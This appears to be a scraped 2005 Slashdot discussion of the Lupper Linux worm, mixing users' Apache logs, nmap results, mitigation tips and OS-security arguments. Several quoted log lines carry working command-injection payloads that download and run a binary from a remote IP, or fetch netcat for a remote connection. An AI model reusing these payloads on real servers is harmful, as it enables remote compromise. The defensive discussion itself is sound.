192.108.119.131 - - [08/Nov/2005:11:57:36 -0500] "GET /hints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$I FS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS \"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193 .244| HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
192.108.119.131 - - [08/Nov/2005:11:57:37 -0500] "GET /cgi-bin/hints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo $IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS` echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62 .101.193.244| HTTP/1.1" 404 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
192.108.119.131 - - [08/Nov/2005:11:57:38 -0500] "GET /scgi-bin/hints/hints.cgi?|cd$IFS/tmp;wget$IFS`ech o$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS `echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`6 2.101.193.244| HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
192.108.119.131 - - [08/Nov/2005:11:57:39 -0500] "GET /webhints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\ "$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$ IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101. 193.244| HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
192.108.119.131 - - [08/Nov/2005:11:57:40 -0500] "GET /cgi-bin/webhints/hints.cgi?|cd$IFS/tmp;wget$IFS`e cho$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$I FS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\" `62.
-- I Dont Deserve A Sig I Have Bad Karma
Or is this a different worm that exploits awstats?
/cgi-bin/awstats.pl HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
//cgi/awstats.pl?configdir=|
/cgi-bin/awstats.pl?configdiro %2fnc%3bchmod%20%2bx%20nc%3b.%2 0 HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)"
First scan at my webserver:
xx.113.128.xxx - - [17/Feb/2005:04:36:36 -0800] "GET
Second scan:
xxx.19.218.xx - - [18/Feb/2005:05:58:19 -0800] "GET
%20id%20| HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
An attempt a few days (and a few scans) later which appears to be a self-sustaining worm:
xx.221.80.xx - - [26/Feb/2005:18:30:46 -0800] "GET
=%20%7c%20cd%20%2ftmp%3bwget%20www.ment0ru.home.r
2fnc%20something4u.propagation.net%2065000%20%7c%
According to the linked site, you are vulnerable if you are running PHP (version?) and have a /{website dir}/cgi-bin directory. I guess that means anyone runnign PHP is vulnerable?
-"...bad old ideas look confusingly fresh when they are packaged as technology" - Jaron Lanier (Digital Maoism on Edge.o
I would like to point out a significant detail. It is far easier to deflect blame away from Linux than it is from Windows because, unlike Windows, Linux doesn't "automatically install" anything. Linux is just a kernel. A linux distro is just a Linux kernel with hundreds of "3rd party apps" tacked on. I'm not knocking Linux at all. I love Linux. But it's not a fair comparison when you're playing the "installed by default" game. The Linux kernel is 100% secure because it can't do anything by itself.
If you mod me down, I shall become less powerful than you could possibly imagine.
Several people have noted that this only affects systems that allow a CGI or PHP script to execute arbitrary programs. I don't think most Windows systems have that short of "shell" access from CGI/PHP. Then again, I know ALAP about Windows...
Just like you would any other directory on any other Unix: pass "noexec" as a flag to the mount command that creates the tmp directory (http://www.netadmintools.com/html/8mount.man.html ):
/tmp
mount -o remount,noexec
Glad I'm running li-- wait, what?
why... That's not MS sharing the IE love, its them trying to open up Macs to virus', those dirty scoundrels!
192.50.74.27
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-11-08 09:49 PST
All 1663 scanned ports on 192.50.74.27 are: filtered
Nmap finished: 1 IP address (1 host up) scanned in 38.322 seconds
========
195.200.183.229
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-11-08 09:51 PST
Interesting ports on 195.200.183.229:
(The 1661 ports scanned but not shown below are in state: filtered)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap finished: 1 IP address (1 host up) scanned in 62.432 seconds
========
200.218.224.224
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-11-08 09:53 PST
All 1663 scanned ports on 200.218.224.224 are: filtered
Nmap finished: 1 IP address (1 host up) scanned in 39.839 seconds
========
202.123.223.148
I killed the process after 2 minutes.
========
210.109.194.231
I killed this one too.
========
211.155.246.38
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-11-08 10:01 PST
All 1663 scanned ports on 211.155.246.38 are: filtered
Nmap finished: 1 IP address (1 host up) scanned in 38.386 seconds
========
Okay, I'm stopping there. I was under the impression that I'd be seeing some open ports. I can only verify port 80 on ONE of those so far.
How OLD are those entries? Why does it appear that the problem, if it ever existed on those machines, has been cleared already?
How did we get stung? Not being dependent on Micro$hit to deliver fixes to buggy 3rd-party scripts, this was "fixed" back in February. *Yawn.*
Now, I don't think most worms really process such errors but it makes me feel better than just ignoring them, and it seems to be far more legal than either redirecting them to fbi.gov or launching some kind of counterattack.
PHEM - party like it's 1997-2003!
You need to escape those #s, too.
Don't tell the windows people that linux has security holes, they may decide it's payback time!
"A new Linux worm is crawling the web looking for a large number of vulnerable PHP systems and applications."
Good luck buddy, I don't think you're gonna find 'em...
What every sysadmin should know is that the unpatched known holes of today are not only open doors for crackers, they are the open doors for the next worms.
Every sysadmin should check security sites like Secunia, with a list of unpatched known holes for each software they use:
http://secunia.com/
If you ever visit Reality, drop in and we'll have a beer.I think I saw that movie, too. It was pretty good. Too bad it was so Hollywood and unrealistic.Really? I would be? Let's see.
http://www.fbi.gov/ucr/cius_02/pdf/02crime2.pdf
So, the FBI records 402,637 "robberies". Of which, 2.3% are bank robberies.
So, all other robberies account for 97.7% of the total. But banks account for only 2.3% (or about 9,261 bank robberies).
But you think that "banks aren't particularly secure"?Strange. I mean, since murder would normally be seen as having "repercussions" that are "more severe" and all. But the FBI records 16,204 murders.
Yet more murders than bank robberies.Nope. The analogy is solid.
It's just that the facts seem to contradict your position.
Anyway, if you're ever in the neighborhood of Reality, stop in for a beer.
Unless you have tripwire or some off-disk checksums of your hard drive, you have no choice but to wipe and re-install configs and data from backups. If you haven't designed your systems to make this easy (keep all configs in /etc, /usr/local/etc, keep all customer data in one dir, etc), you're just making extra work for yourself OR making excuses why you shouldn't clean up a pwned machine.
/tmp, big deal".
Sure, 99% of the time, script kiddies are easy to clean up after. You might run into that 1% that make themselves root with an unpublished exploit, and install a kernel mod to hide themselves, and you think "oh, it's just some kiddies littering
That's happened to me exactly once in my 10+ year career, but once was too much!
Here are the reported numbers:
"Sources" is a count of infected PCs, i.e., unique IP addresses "originating traffic".
"Targets" are the PCs "receiving traffic".
"Records" is the number of PACKETS observed.
What is odd is that while there are supposedly 111 PCs that are infected and sending out hack attempts, those 111 PCs seem to target ONLY 8 PCs, and the total PACKET transmitted/recieved on 11/03 was only 22K. Very strange. Very LOW numbers and with a VERY LIMITED number of boxes.
Notice that the majority of "infections" are occuring on Nov 3, 4 and 5, and the reports from THREE anti-virus houses are on the 4th and 5th, the same day as the big spike in the "infection":
A scan from VirusTotal detects "cback" as:
Antivirus Version Update Result
Fortinet 2.48.0.0 11.04.2005 Linux/Rev.B-bdr
Kaspersky 4.0.2.24 11.05.2005 Backdoor.Linux.Small.al
McAfee 4620 11.04.2005 Linux/BackDoor-Rev.b
For such an infintesimally small number of supposedly hacked boxes these three anti-Virus houses already have dection software which can see the "trojan". That is REALLY FAST dection code writing, deployment and reporting for such a SMALL number of boxes.
Has someone salted the Linux anti-virus mine to hype business?
Running with Linux for over 20 years!
if you're using mod_security on Apache/UNIX platforms, you can set this globally.
:)
SecFilterSelective "THE_REQUEST" "xmlrpc\.php" "deny,,status:412"
and only enable for VirtualHost blocks that needs it. be sure to patch your stuff!
SecFilterSelective "THE_REQUEST" "xmlrpc\.php" "allow,log," you can also enable Apache's SetEnvIf & conditional logging to pipe all xmlrpc.php requests to a centralized log file for analysis.
If you were in their situation, what would you do?
Considering that there is already ClamAV in Linux space? I Probably be weaving a golden parachute.
This sig. intentionally left blank.
I've often noted that when faced with facts, the loser will make some braggart statement instead of attempting to present facts of his own.
And you're another example of that.
I've posted links and facts. You only have your claims based upon your complete lack of understanding of security. Buh bye!
It's called using the vernacular.
In a conversation like this, the obvious meaning of the word "Linux" is a fully functioning GNU/Linux distribution, consisting of the major components: the Linux kernel itself, everything related to GNU (apps, glibc, etc), and various 3rd party components as chosen by the distibution maintainer.
More help here.
Endless arguments over trivial contradictions in books written by ignorant savages to explain thunder in the dark.
I've been seeing requests for some of these URLs for 6 months now. I figured it was a worm but I know I'm patched and I don't run any of that stuff anyway. Amazing to me that people get owned by this sort of thing.
:-D
Between this and the SSH worm, maybe its time to investigate using Windows ME with Personal Web Server.
The Anti-Blog
going to members.lycos.co.uk/sugi brings up some other files that look like they are phishers too. I think rather than immediatly shut them down, it would be more effective to set up a sting. Lycos could retrieve the last ip address to log into that account. If it wasn't a compromised machine, they could contact the isp. When the next login is attempted, they could have the isp locate which customer it is, and bust down their door.
It's really sad that the AV companies haven't tried to shut the site down via contacting Lycos. It really shows me their commitment to security for the sake of security.
If an officer ever threatens to taze you, say you have a pacemaker.
PHP is neither secure nor insecure. Individual applications are secure or insecure. PHP allows insecure applications and doesn't particularly encourage secure applications, nor does it limit the capabilities of secure applications.
There are application environments that are inherently safe... that is, they implement a sandbox that fails closed. Individual applications may be insecure, but if the application's security fails the attacker does not gain any capabilities that can be used to launch further attacks on other systems or other users on the same system.
The worst part is that most of them know they are infected, but they choose not to do anything about it because it's easier to put up with a slow machine (their infected sooper-dooper boxes, which they only use for email and WildTanget, are slow as a 16 MHz 386) than to learn enough about the problem to fix it.
Since Comcast is too greedy and incompetent to block the customer ports that are clearly spewing virii and worms in all directions (they won't even shut down a human-guided attack unless I call them multiple times) the situation can do nothing but get worse.
Thank you for a well reasoned counterargument. You don't find many of those on here :-)
Regards,
Steve
Yes the title is a troll. No, the point is not.
/. are somewhat (though not much) more helpful than McAfee's removal instructions, which are to upgrade my version of a Windows virus checker. But SD really does not have a better answer for the concerned admin on what he should be looking for to ensure his system is safe.
Linux (and open source in general) is always touted as better than closed-source because there is such a large community of geeks who know the stuff well, so anyone looking for information can tap into the community of geeks to get answers, instead of calling an idiot tech rep for $$/hour.
Except that communities of geeks are notoriously unapproachable, and their willingness to part with their geekily gained information is low. If the responses to this Slashdot article are any indication, geeks are more interested in belittling others (including other geeks) than actually providing useful information.
Albeit the geekish hordes of
BTW, Wordpress 1.5 is safe.
Terrorists can attack freedom, but only Congress can destroy it.
Security is independant of popularity.
There is nothing about popularity that makes a system more or less secure.No.No. FEWER banks are robbed because they have BETTER security.
In order to get down to ZERO banks robbed, you'd have to get to PERFECT security.Because their security is not perfect.Now you're confusing "risk" with "security".
The two are not the same.
Security != Popularity
Security != RiskRead "Attack Trees" by Bruce Schneier.
http://www.schneier.com/paper-attacktrees-ddj-ft.
Security is all about reducing the avenues of attack.
If a Linux box is 100% secure from digital attack via the Internet (no ports open), it is still vulnerable to someone breaking into your office and taking the box. Big fat hairy deal. But it is still safe from that worm.
It's not so easy to compare as that. Unless you consider an OS being widely deployed to be a security flaw -- in which case Linux is doomed to be as bad as Windows if it succeeds...
If an OS, let's call it X, is rare, worms can't spread quickly, just because they can't find instances to spread to. The effects of this are very non-linear, with the popular OS being at a very major disadvantage.
If X is rare, few felons will have the expertise to attack it.
If X is rare, few felons will have the motivation to attack it.
Conversely, if X is widespread, and hated among felons, it will be an attractive target.
If X is commonly business-critical, a great deal of publicity comes with each attack, and felons can get glory from the press and praise from their felonious peers.
The bottom line is that there are many factors beyond the security of an OS in how widespread a worm becomes. In addition to the issues I listed above, consider how quicly patches get pushed out, which depends both on OS support for security patch distribution and administrator attentiveness. Consider the bandwidth of the typical connection, the nature of the hole, how likely it is to be blocked by non-OS firewalls, etc. etc.
So I'm afraid the MS vs Linux security question isn't going to be settled at all by comparing this worm's spread to any other worm, nor even by comparing any large population of worms.
Sorry -- it would be nice if the world were so simple.
Internet Storm Center has information about new variant reported by TrendMicro:
u lt5.asp?VName=ELF_LUPPER.B&VSect=P
http://isc.sans.org/diary.php?storyid=829
and the description itself is at http://www.trendmicro.com/vinfo/virusencyclo/defa
The reason why this worm exist is due to the wide deployment of Windows Desktops with this specific vulnerability. There just aren't many Linux Desktops out there to bother with them.
Call me a heretic, but this is roughly correct, with some caveats.
OSS systems tend to have patches availible faster, so the bugs that lead to worms _can_ be fixed. It's just not realisitc to expect that they will be _always_ fixed (or even _often_ fixed). There's also really nothing you can do about the "I love you" strain of worms other than user education.
my ISP blocks port 80 incoming....:-(
(Keeps my firewall logs short at least.)
Microsoft hasn't released an updated for IE on OS X since 6/16/2003. They only released that small upgrade from 5.2.1 because of an asinine amount of bugs in 5.2.1, including one that I found and reported. They made a big todo over 5.2.1 being their last Mac release. 2.5 years is more than long enough to consider that IE is no longer available as a Mac product. You can still pick up a Redhat release that supports Sparc (5.x). Does that mean that RH supports Sparcs? No, it doesn't.
p4k1tst0rm ~ # uname -a /etc/gentoo-release
Linux p4k1tst0rm 2.6.13-hardened #1 SMP Tue Sep 20 21:24:24 CDT 2005 i686 Pentium III (Coppermine) GenuineIntel GNU/Linux
p4k1tst0rm ~ # cat
Gentoo Base System version 1.6.13
Bring it on =]
This just goes to show that people are recognizing Linux enough to be willing to write viruses for it.
Linux is to the internet as Duct Tape is to the Universe.
Could it be a one time pad? O_O
I think the developers who left these vulnerabilities open should be financially responsible for the damage this may cause.
"Derp de derp."
i was scanned from 216.128.227.73 (19 hits) and 24.42.129.18 (14 hits).
first tries a wget fron 195.224.174.18/nikon, 2. one from 24.224.174.18/listen
both are down.
a third tries to get 62.101.193.244/lupii from 64.246.0.38, but it's down, too.
"listen" is also tried from 24.224.2.174/listen
more info on it here: http://isc.sans.org/diary.php?storyid=823
Still a lot better than, "If you're running Windows you're fucked."
I notice that one of the listed vulnerabilities in awstats - definitely the fault of the administrator because not only is there a patched awstats version to address this well-documented vulnerability (check the project page at sourceforge), but you should also NOT make awstats publicly available. Lock it down so it can be accessed either only from your local/LAN IP range, or at least use http authentication (read up on .htaccess, man htpasswd/htpasswd2).
If you don't understand how to do either, I wouldn't say that you shouldn't be allowed near computers (everyone has to start from somewhere) but I will tell you that you need to RTFM. Yesterday.
Chances are that if you don't have the vulnerable apps locked down or patched already, you've already been rooted. Download/install rkhunter and chkrootkit and run them, keep them updated, set them up on cron jobs (man crontab), and actually read the reports daily - or at least the summaries.
The Christian Right is Neither (Christian nor right). See: Matthew 23, Matthew 25, Ezekiel 16:48-50